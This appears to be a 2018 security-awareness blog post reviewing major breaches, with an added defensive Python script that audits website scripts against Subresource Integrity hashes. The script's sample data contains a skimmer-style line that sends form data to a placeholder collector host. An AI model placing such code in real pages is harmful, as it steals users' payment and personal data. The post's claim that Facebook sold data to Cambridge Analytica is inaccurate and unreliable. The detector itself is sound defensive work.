It’s that time of year again where we look back to look forward.
Being security aware means that we know what to expect and how to deal with it. As part of this, we need to keep a keen eye on what cyber-attacks have happened recently. Now that we are coming to the close of 2018, let’s look back at some of the biggest cybersecurity attacks of the year and what we can learn from them.
But before we start to look at some of the 2018 mega-hacks, check out some of the numbers from the last 12-18 months collected by analysts and industry experts.
From the UK Government 2018 UK Cybersecurity Breaches Survey:
43% of companies, of all sizes, experienced a cyber breach
42% of micro companies experienced a cyber breach
75% of employees reported receiving spoof emails
But we are learning: 92% of companies applied software patches when they became available; otherwise, the breach figures may have been even higher
Across the world, some sobering statistics:
In the first half of 2018, there were 18.5 million records lost every single day
Less than 3% of data breaches were secured (i.e. in the rest, the data was not encrypted)
In August alone, there were 215 million data records exposed.
The costs are staggering:
Ponemon and IBM found that the average cost of a data breach in the year to July 2018 was up by 6.4% from the previous year to $3.86 million (approximately £2.9 million)
A UK-specific study, the PWC 2018 Global Economic Crime Survey, found that UK firms lost, on average, £700,000 due to fraud.
The Mega-Hack Olympics of 2018
Now, onto the hacks of the year: these aren’t necessarily the “biggest” or “worst”, but ones we consider to have had a significant impact and that show a real range of attack vectors. In fact, there has been a rich list of companies who have been hacked in 2018 and it is hard to pick a “winner”. We have decided to keep it to hacks that have hit UK companies or, at least, affected UK citizens. Many of these hacks have human error or mishaps as a central theme.
When: Throughout 2018
Who: Schools across the UK
How many affected: Multiple
A number of schools across the UK, including in the private sector, were targeted with a phishing campaign in 2018. The targeting was spread across multiple schools, relying on the lack of IT resourcing and poor security to get at sensitive data. The mechanism into the network each time was a phishing email used to steal login credentials to the network. Once in the network, personal data, including email addresses, were harvested. The cybercriminals subsequently targeted parents of children at private schools in a modified Business Email Compromise type scam. The compromised school network was used to locate the email addresses of parents paying for school places. The email the parents received contained an invoice for fee payment, and the payment was then sent to the hackers’ account.
When: Throughout 2017 with action taken in 2018
Who: Bupa Insurance Services Limited
How many affected: 547,000
This was a case of insider threat. An employee at BUPA extracted the personal data of over half a million customers and sent it to his personal email address. The data included names, addresses, nationality, etc. The BUPA employee then put the data up for sale on the dark web. BUPA was fined £175,000 by the UK’s Information Commissioner’s Office (ICO) in late 2018, for not putting the right security measures in place to spot unusual behaviour.
When: February to June 2018
How many affected: 40,000 UK customers
Anyone who bought tickets from Ticketmaster between February and June 2018 may have had their personal data breached. The breach was caused when a third-party vendor of Ticketmaster, Inbenta Technologies, a chat tool supplier, was hacked. Unbeknownst to Inbenta, their software had been exploited and was exporting data to a hacker who had taken control of the chat tool; a case of “cyber-whispers”.
Bronze Medal: Facebook
When: September 2018
How many affected: 30 million
First, there was the Facebook/Cambridge Analytica debacle, when Facebook sold data, without user consent, to the data mining company Cambridge Analytica. Then came the data breach where around 30 million Facebook users had their accounts compromised. The data leaked was personal, and potentially has secondary attack implications. Many online services use a system known as Knowledge Based Authentication (KBA), which asks personal questions such as “What is your mother’s maiden name?” to recover passwords, etc. The data collected by hackers from exposed Facebook accounts could potentially provide all of the KBA answers needed to hack into commercial sites.
Facebook may now face a fine of up to 4% of their gross global revenue if the attack is found to be non-compliant with GDPR rules.
What caused it? Investigations are continuing, but the attack seems to be highly targeted and focuses on a flaw in the “View As” functionality of the platform.
Facebook has posted a notice to allow users to find out if they were one of the affected 30 million.
Silver Medal: Marriott/Starwood
When: November 2018 announcement, but was an ongoing breach
Who: Marriott Hotel and Starwood
How many affected: 500 million
The hack of Starwood, a subdivision of Marriott Hotels, ended with the exposure of the personal data of around 500 million guests. The data leak included name, address, and passport number. Some of the leaked data also contained financial details such as credit card numbers – the latter, however, was encrypted. Marriott’s stock was down 5% after the breach report went public.
What caused it? The jury is still out on the exact cause of the breach. However, there are concerns surfacing about the merger of Starwood with Marriott and how this may have impacted security strategy and the overlap of security measures. The latest view is that a Chinese hacking gang was behind the targeted attack.
Gold Medal: British Airways
When: August-September 2018
Who: British Airways
How many affected: 380,000
In the Mega-Hack Olympics, there can only be one “winner” and this year it has to be that national treasure, British Airways. BA is now facing a fine of around £897 million for the breach of data of around 380,000 passengers. As well as personal data, the exposed information includes full credit card details along with the CVV number of the card. Most customers were urged by their bank to close down card accounts to manage the breach.
What caused it? Again, BA was targeted, this time by a hacking gang known as Magecart. RiskIQ looked at the anatomy of the breach and found that it was likely due to the hackers changing the code on the BA website and in the BA mobile app. The changed code then made sure that any data that was submitted to the BA site/app was also sent to a site that was under the control of the hackers. Simple, but very effective, and very damaging to BA’s customers.
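An added example, not part of the original article or of RiskIQ's analysis: one way a site owner can detect the kind of script change described above is to pin each released script to its Subresource Integrity hash and audit what is actually being served. The paths, hostnames and script bodies below are constructed for illustration.

```python
import base64
import hashlib
import re

# Hostnames that appear in absolute URLs inside a script body.
URL_HOST = re.compile(rb"https?://([A-Za-z0-9.-]+)")


def sri_hash(body: bytes) -> str:
    """Subresource Integrity value (sha384, base64) for a script body."""
    digest = hashlib.sha384(body).digest()
    return "sha384-" + base64.b64encode(digest).decode("ascii")


def referenced_hosts(body: bytes) -> set:
    """Lower-cased hostnames the script refers to by absolute URL."""
    return {h.decode("ascii").lower() for h in URL_HOST.findall(body)}


def audit_scripts(pinned: dict, served: dict, allowed_hosts: set) -> list:
    """Compare served scripts with the release baseline; return findings."""
    findings = []
    for path, body in sorted(served.items()):
        if path not in pinned:
            findings.append((path, "script not in release baseline"))
        elif sri_hash(body) != pinned[path]:
            findings.append((path, "content differs from released version"))
        for host in sorted(referenced_hosts(body) - allowed_hosts):
            findings.append((path, "references unapproved host " + host))
    for path in sorted(set(pinned) - set(served)):
        findings.append((path, "pinned script no longer served"))
    return findings


# Constructed sample data: a released checkout script and a modified copy.
RELEASED = b"function pay(f){return fetch('https://shop.example/api/pay',{method:'POST',body:new FormData(f)});}\n"
MODIFIED = RELEASED + b"navigator.sendBeacon('https://collector.invalid/c', new FormData(document.forms[0]));\n"
PINNED = {"/js/checkout.js": sri_hash(RELEASED)}
ALLOWED = {"shop.example"}

if __name__ == "__main__":
    for path, issue in audit_scripts(PINNED, {"/js/checkout.js": MODIFIED}, ALLOWED):
        print(path, "-", issue)
```

The same hash can go in a script tag's `integrity` attribute so the browser refuses a modified third-party script, and a Content-Security-Policy `connect-src` directive limits where page scripts may send data.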
Can We Expect a Breach Free New Year?
Although it is usually only the biggest hacks that make the news headlines, all companies, across all sectors, are at risk of a cybersecurity attack. What we must do is learn from the mistakes made by others. Each breach that happens gives us an insight into how a cybercriminal operates and the weaknesses that they leverage. We can look to the issues of 2018 and see that many were due to human factors such as phishing and insider threats. Others were due to poor secure coding techniques, or a simple lack of attention to detail when applying security measures.
Being cyber-security aware gives us the ammunition to take on cybercrime. With the right security awareness training in place, we can make sure that employees spot a phishing email or unusual employee behaviour before the worst happens. With knowledge comes strength to protect our businesses and make 2019 a year where cybercrime takes the hit, not our data.